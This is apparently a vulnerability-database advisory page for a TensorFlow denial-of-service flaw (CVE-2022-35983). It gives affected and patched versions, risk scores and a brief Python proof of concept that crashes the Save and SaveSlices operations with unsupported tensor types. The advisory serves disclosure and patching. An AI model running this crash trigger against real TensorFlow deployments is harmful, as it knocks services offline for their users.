Data

Tools

Indexes

Applications

Experiments

Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

GSA_kwCzR0hTQS1tNnZwLThxOWotd2h4NM4AAu27

Moderate EPSS: 0.00215% (0.44148 Percentile) EPSS:
Permalink JSON

TensorFlow vulnerable to `CHECK` fail in `Save` and `SaveSlices`

Affected Packages Affected Versions Fixed Versions
pypi:tensorflow-gpu
PURL: pkg:pypi/tensorflow-gpu
>= 2.9.0, < 2.9.1, >= 2.8.0, < 2.8.1, < 2.7.2 2.9.1, 2.8.1, 2.7.2
155 Dependent packages
11,499 Dependent repositories
78,758 Downloads last month

Affected Version Ranges

All affected versions

0.12.0, 0.12.1, 1.0.0, 1.0.1, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.4.0, 1.4.1, 1.5.0, 1.5.1, 1.6.0, 1.7.0, 1.7.1, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.12.0, 1.12.2, 1.12.3, 1.13.1, 1.13.2, 1.14.0, 1.15.0, 1.15.2, 1.15.3, 1.15.4, 1.15.5, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.7.0, 2.7.1, 2.8.0, 2.9.0

All unaffected versions

2.7.2, 2.7.3, 2.7.4, 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.9.1, 2.9.2, 2.9.3, 2.10.0, 2.10.1, 2.11.0, 2.12.0
pypi:tensorflow-cpu
PURL: pkg:pypi/tensorflow-cpu
>= 2.9.0, < 2.9.1, >= 2.8.0, < 2.8.1, < 2.7.2 2.9.1, 2.8.1, 2.7.2
88 Dependent packages
2,483 Dependent repositories
909,001 Downloads last month

Affected Version Ranges

All affected versions

1.15.0, 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.7.0, 2.7.1, 2.8.0, 2.9.0

All unaffected versions

2.7.2, 2.7.3, 2.7.4, 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.9.1, 2.9.2, 2.9.3, 2.10.0, 2.10.1, 2.11.0, 2.11.1, 2.12.0, 2.12.1, 2.13.0, 2.13.1, 2.14.0, 2.14.1, 2.15.0, 2.15.1, 2.16.1, 2.16.2, 2.17.0, 2.17.1, 2.18.0, 2.18.1, 2.19.0, 2.19.1, 2.20.0
pypi:tensorflow
PURL: pkg:pypi/tensorflow
>= 2.9.0, < 2.9.1, >= 2.8.0, < 2.8.1, < 2.7.2 2.9.1, 2.8.1, 2.7.2
2,172 Dependent packages
73,755 Dependent repositories
21,825,433 Downloads last month

Affected Version Ranges

All affected versions

0.12.0, 0.12.1, 1.0.0, 1.0.1, 1.1.0, 1.2.0, 1.2.1, 1.3.0, 1.4.0, 1.4.1, 1.5.0, 1.5.1, 1.6.0, 1.7.0, 1.7.1, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.12.0, 1.12.2, 1.12.3, 1.13.1, 1.13.2, 1.14.0, 1.15.0, 1.15.2, 1.15.3, 1.15.4, 1.15.5, 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.2.0, 2.2.1, 2.2.2, 2.2.3, 2.3.0, 2.3.1, 2.3.2, 2.3.3, 2.3.4, 2.4.0, 2.4.1, 2.4.2, 2.4.3, 2.4.4, 2.5.0, 2.5.1, 2.5.2, 2.5.3, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.7.0, 2.7.1, 2.8.0, 2.9.0

All unaffected versions

2.7.2, 2.7.3, 2.7.4, 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.9.1, 2.9.2, 2.9.3, 2.10.0, 2.10.1, 2.11.0, 2.11.1, 2.12.0, 2.12.1, 2.13.0, 2.13.1, 2.14.0, 2.14.1, 2.15.0, 2.15.1, 2.16.1, 2.16.2, 2.17.0, 2.17.1, 2.18.0, 2.18.1, 2.19.0, 2.19.1

Impact

If Save or SaveSlices is run over tensors of an unsupported dtype, it results in a CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf
filename = tf.constant("")
tensor_names = tf.constant("")
# Save
data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=-2021), tf.uint64)
tf.raw_ops.Save(filename=filename, tensor_names=tensor_names, data=data, )
# SaveSlices
shapes_and_slices = tf.constant("")
data = tf.cast(tf.random.uniform(shape=[1], minval=-10000, maxval=10000, dtype=tf.int64, seed=9712), tf.uint32)
tf.raw_ops.SaveSlices(filename=filename, tensor_names=tensor_names, shapes_and_slices=shapes_and_slices, data=data, )

Patches

We have patched the issue in GitHub commit 5dd7b86b84a864b834c6fa3d7f9f51c87efa99d4.

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Di Jin, Secure Systems Labs, Brown University

References:

Identifiers

GHSA-m6vp-8q9j-whx4

CVE-2022-35983

Risk

Severity

Moderate

EPSS

EPSS Percentage: 0.00215

EPSS Percentile: 0.44148

Classification

General

Source

GitHub Advisory Database

Origin

Unspecified

Repository

https://github.com/tensorflow/tensorflow

Date and time

Published

almost 3 years ago

Updated

over 2 years ago

API

JSON